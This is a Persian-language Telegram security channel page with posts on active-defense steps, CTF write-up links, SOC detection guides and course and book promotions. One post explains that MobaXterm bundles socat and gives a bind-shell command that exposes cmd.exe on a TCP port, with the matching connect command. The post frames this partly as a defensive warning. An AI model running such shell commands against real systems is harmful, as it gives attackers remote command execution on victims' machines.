securityworld
4.05K subscribers
1.03K photos
14 videos
53 files
1.07K links
آموزش امنیت و تست نفوذ
https://securityworld.ir

@ENITP
Download Telegram
Forwarded from dfir
به مقاله زیر توجه کنید 👇👇👇👇
Forwarded from dfir
🔐 مراحل اجرای دفاع فعال (Active Defense) در سازمان 🔐
------------------------------
در دنیای امروز که تهدیدات سایبری به‌طور مداوم در حال تغییر و پیشرفت هستند، سازمان‌ها نیاز به رویکردهای پیشگیرانه و پیش‌دستانه برای شناسایی، تحلیل و پاسخ به تهدیدات دارند. دفاع فعال (Active Defense) یکی از این رویکردهاست که به سازمان‌ها کمک می‌کند تا به صورت پیش‌دستانه از خود در برابر حملات سایبری محافظت کنند. در ادامه به مراحل اجرای دفاع فعال در سازمان می‌پردازیم:

1. ارزیابی وضعیت فعلی امنیتی
- شناسایی دارایی‌ها و تحلیل ریسک: لیست کردن تمامی دارایی‌های دیجیتال شامل سخت‌افزارها، نرم‌افزارها و داده‌ها و ارزیابی ریسک‌های مرتبط با هر دارایی.
- بررسی زیرساخت‌های امنیتی فعلی: شناسایی نقاط ضعف و قوت در زیرساخت‌های امنیتی فعلی سازمان و تعیین نیازمندی‌های امنیتی.

2. طراحی استراتژی دفاع فعال
- تدوین سیاست‌ها و فرآیندها: تدوین سیاست‌های امنیتی مبتنی بر دفاع فعال و فرآیندهای مشخص برای پاسخ به انواع مختلف حوادث امنیتی.
- انتخاب ابزارها و تکنیک‌های دفاع فعال: انتخاب و پیاده‌سازی ابزارهای پیشرفته برای شناسایی تهدیدات مانند SIEM، EDR و IDS و استفاده از فناوری‌های فریب مانند هانی‌پات‌ها و دام‌افزارها.

3. پیاده‌سازی و استقرار
- پیاده‌سازی ابزارهای تشخیص و پاسخ: نصب و پیکربندی سیستم‌های مدیریت رویداد و اطلاعات امنیتی (SIEM) و ابزارهای شناسایی و پاسخ به نقاط انتهایی (EDR).
- راه اندازی تکنیک‌های فریب: ایجاد هانی‌پات‌ها و دام‌افزارها در نقاط استراتژیک شبکه برای جذب مهاجمان و تحلیل رفتارهای آن‌ها.

4. نظارت و مانیتورینگ مستمر
- مانیتورینگ 24/7: نظارت مداوم بر تمامی فعالیت‌های شبکه و سیستم‌ها برای شناسایی تهدیدات و ناهنجاری‌ها.
- تحلیل و ارزیابی مداوم: تحلیل مداوم لاگ‌ها و رویدادهای امنیتی و ارزیابی اثربخشی ابزارها و تکنیک‌های دفاع فعال.

5. پاسخ به حوادث و بازیابی
- پاسخ سریع به حوادث: ایزوله کردن سیستم‌های آلوده و تحلیل سریع تهدیدات برای رفع آن‌ها.
- بازیابی و بازسازی: بازیابی داده‌ها و سیستم‌های آسیب‌دیده و اطمینان از برقراری مجدد امنیت.

6. آموزش و توسعه مداوم
- آموزش_تیم_امنیتی: برگزاری دوره‌های آموزشی منظم و اجرای تمرین‌های شبیه‌سازی حملات.
- بهبود_مستمر: ارزیابی مداوم عملکرد تیم امنیتی و به‌روزرسانی سیاست‌ها و فرآیندهای امنیتی.

🌟 نتیجه‌گیری
اجرای دفاع فعال در سازمان به معنای اتخاذ رویکردهای پیشگیرانه و پیش‌دستانه برای شناسایی، تحلیل و پاسخ به تهدیدات سایبری است. با پیاده‌سازی مراحل فوق، سازمان‌ها می‌توانند امنیت خود را به‌طور چشمگیری افزایش دهند و از آسیب‌های جدی ناشی از حملات سایبری جلوگیری کنند.

🔗 برای اطلاعات بیشتر و به اشتراک‌گذاری تجربیات خود در زمینه دفاع فعال و امنیت سایبری، با من در ارتباط باشید!

#امنیت_سایبری #دفاع_فعال #شناسایی_تهدید #امنیت_اطلاعات #SOC #شکار_تهدیدات #SIEM #EDR #هانی_‌پات #فریب_امنیتی
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش AD Credential Dump هم اکنون در سایت قرار شد.

🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/blog/active-directory-credential-dumping
کتاب آشنایی با پروتکل HTTP - بخش شانزدهم

✔️ در این بخش به فصل پانزدهم از کتاب HTTP The Definitive Guide با عنوان Internationalization پرداخته شده است.

🔴 جهت دانلود ترجمه بخش شانزدهم از این کتاب به لینک زیر مراجعه نمایید:

🌐 yun.ir/5je852
🔴 ایام سوگواری سید و سالار شهیدان حضرت امام حسین (ع) و تاسوعا و عاشورای حسینی را خدمت شما همراهان گرامی تسلیت عرض می نماییم.
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش آنالیز بسته های شبکه (Cisco) هم اکنون در سایت قرار شد.

🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/blog/cisco-packet-analysis
Forwarded from SecCode (Meisam Monsef)
This media is not supported in your browser
VIEW IN TELEGRAM
مصاحبه سینا خیرخواه که یکی از شاگردان بسیار موفق من در برنامه
Critical Thinking - Bug Bounty Podcast
خیلی خوشحال هستم که با تلاش های خودت توانستی به موفقیت های بزرگ برسی
امیدوار هستم که هرجا هستی موفق و پیروز باشی

لینک کامل مصاحبه :‌https://www.youtube.com/watch?v=S78r0Pc5ph4


@SecCode
Forwarded from challenginno.ir
✔️ در فرآیند تست نفوذ، انجام اسکن شبکه و پورت، بسیار مهم است. پس از شناسایی IP و پورت های باز یک سیستم در شبکه، می بایست سرویس هایی که بر روی پورت ها در حال فعالیت هستند نیز شناسایی شود.

پس از شناسایی سرویس، نوبت به شناسایی آسیب پذیری موجود بر روی آن است.

این چالش به همین موضوع می پردازد و شما می بایست مراحل مذکور را انجام داده و سرویس آسیب پذیری را شناسایی کنید.

لازم به ذکر است که این چالش،اولین چالش است که در محیط ویندوز ایجاد شده و در سایت قرار می گیرد.

🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/web-service-vulnerabilities-windows
دوره آموزشی SEC401

✔️ در این دوره آموزشی شما با مفاهیم پایه ای حوزه امنیت شبکه و اطلاعات آشنا می شوید. این دوره به عنوان اولین دوره از نقشه راه موسسه SANS مباحث مختلفی را مورد بحث قرار می دهد که در ادامه شما را برای ورود به بخش های دیگر آماده می سازد.

🔰 بخش هایی از سرفصل دوره آموزشی SEC401

Defensible Network Architecture
Networking and Protocols
Network Device Security
Virtualization and Cloud Security
Securing Wireless Networks
Defense-in-Depth
Access Control and Password Management
Security Policy
CIS Controls
Malicious Code and Exploit Mitigation
Securing Web Communications
Vulnerability Scanning and Penetration Testing
Network Security Devices
Endpoint Security
SIEM-Log Management
Active Defense
Cryptography
Cryptography Algorithms and Deployment
Applying Cryptography
Incident Handling and Contingency Planning


🔴 جهت مشاهده جزئیات این دوره و تهیه آن به لینک زیر مراجعه نمایید:

🌐 yun.ir/ztqnld
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش ارتقاء سطح دسترسی در لینوکس 3 - Warm-up هم اکنون در سایت قرار شد.

🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/blog/linux-privilege-escalation-warm-up
سلام و عرض ادب خدمت دوستان گرامی

یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست

ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه

ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست

نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.

مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):

C:\Users\test\AppData\Roaming\MobaXterm\slash\bin

به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره

دستور ایجاد کانکش جهت تست هم به شکل زیر هست:

Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes

Kali:
socat - TCP4:192.168.66.132:4443
Forwarded from challenginno.ir
✔️ یکی از سرویس هایی که در اکثر سازمان ها مورد استفاده قرار می گیرد سرویس Active Directory می باشد.

در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.

در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.

لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.

🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/activedirectory-zero
Forwarded from dfir
سند راهنمای SOC برای شناسایی و پاسخگویی به سوءاستفاده از آسیب‌پذیری CVE-2024-21412

👇👇👇👇👇👇
Forwarded from dfir
سند_راهنمای_SOC_برای_شناسایی_و_پاسخگویی_به_سوءاستفاده_از_آسیب.pdf
810.8 KB
سند راهنمای SOC برای شناسایی و پاسخگویی به سوءاستفاده از آسیب‌پذیری CVE-2024-21412
Forwarded from dfir
سند راهنمای تشخیص تکنیک دور زدن EDR با متد LayeredSyscall
The detection guide document for the EDR evasion technique using the LayeredSyscall method.

به همراه رول های تشخیصی ELK, Sysmon, splunk 👇👇👇👇👇👇👇👇
کتاب آشنایی با پروتکل HTTP

✔️ با توجه به استفاده روز افزون از وب و تکنولوژی‌های مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل می‌دهد، بسیار حائز اهمیت است.

✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخش‌های مختلف این پروتکل می‌پردازد.


🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزه‌های وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.

🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
HTTP-Final.pdf
24.9 MB
ترجمه کتاب HTTP The Definitive Guide
💡با سلام و عرض ادب خدمت کلیه دوستان گرامی

✔️ موسسه SANS یکی از شرکت های معتبر در زمینه آموزش های امنیت شبکه و اطلاعات می باشد. با توجه به دوره های تفکیک شده ای که این شرکت ارائه می کند، مدتی است که مورد توجه علاقمندان حوزه امنیت قرار گرفته است.

✔️ یکی از دوره هایی که در نقشه راه تست نفوذ موسسه SNAS، مطالعه آن پیشنهاد شده، دوره تست نفوذ وب یا همان SEC542 می باشد.

🔰 هم اکنون این دوره آموزشی به صورت مجزا و در پنج بخش زیر قابل تهیه می باشد:

بخش اول - Introduction and Information Gathering
yun.ir/79yazd
بخش دوم - Configuration, Identity, and Authentication Testing
yun.ir/z0v5pc
بخش سوم - Injection
yun.ir/126apf
بخش چهارم - XSS-XXE
yun.ir/xzat28
بخش پنجم - CSRF, Logic Flaws and Advanced Tools
yun.ir/pkjugd